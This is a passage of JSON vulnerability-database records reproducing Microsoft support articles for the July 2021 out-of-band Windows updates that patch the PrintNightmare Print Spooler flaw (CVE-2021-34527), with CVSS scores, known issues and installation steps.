{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004946 (OS Build 18363.1646) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004946", "href": "https://support.microsoft.com/en-us/help/5004946", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:44", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003667](<https://support.microsoft.com/help/5003667>) (released June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive the following error:\"Cannot connect to <Server name>, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004953>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004953](<https://download.microsoft.com/download/2/6/c/26ceb7c6-ee36-40d8-bd9c-a0cea2d48fdd/5004953.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004953 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004953", "href": "https://support.microsoft.com/en-us/help/5004953", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:39", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**5/11/21 \nREMINDER **Windows 10, version 1809 reached end of service on May 11, 2021 for devices running the Enterprise, Education, and IoT Enterprise editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.We will continue to service the following editions: Enterprise G, HoloLens, and the LTSC editions for Client, Server, and IoT.\n\n**5/11/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in April 2021. In the May 11, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1809 update history [page](<https://support.microsoft.com/en-us/help/4464619>).\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing [KB4493509](<https://support.microsoft.com/en-us/help/4493509>), devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| \n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/en-us/help/4496404>).\n 2. Select **Check for Updates** and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.\n**Note **If reinstalling the language pack does not mitigate the issue, reset your PC as follows:\n\n 1. Go to the **Settings **app > **Recovery**.\n 2. Select **Get Started** under the **Reset this PC **recovery option.\n 3. Select **Keep my Files**.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the May 11, 2021 servicing stack update (SSU) (KB5003243) or the latest SSU (KB5003711) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/en-us/help/4535697>).If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004947>)website. \nWindows Server Update Services (WSUS)| Yes| You can import this update into WSUS manually. See the [Microsoft Update Catalog](<https://docs.microsoft.com/en-us/windows-server/administration/windows-server-update-services/manage/wsus-and-the-catalog-site#the-microsoft-update-catalog-site>) for instructions. \n**File information **For a list of the files that are provided in this update, download the [file information for cumulative update 5004947](<https://download.microsoft.com/download/5/5/3/553b918f-10d2-4ecb-aa41-3aad1fbfe0c3/5004947.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004947 (OS Build 17763.2029) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004947", "href": "https://support.microsoft.com/en-us/help/5004947", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:43", "description": "None\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1507 update history home page.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001399) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog ](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004950>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004950](<https://download.microsoft.com/download/7/6/2/7621b6b3-765e-4b2a-9358-5d49ad17e3fa/5004950.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004950 (OS Build 10240.18969) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004950", "href": "https://support.microsoft.com/en-us/help/5004950", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:46", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>). \n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010[.](<https://support.microsoft.com/help/5005010>)\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004960>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004960](<https://download.microsoft.com/download/b/6/5/b6562791-88a6-461f-a98d-366e9f7c194f/5004960.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 7, 2021\u2014KB5004960 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004960", "href": "https://support.microsoft.com/en-us/help/5004960", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:45", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003661](<https://support.microsoft.com/help/5003661>) (released June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010.](<https://support.microsoft.com/help/5005010>)\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive an error, \"Cannot connect to <Server name>, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 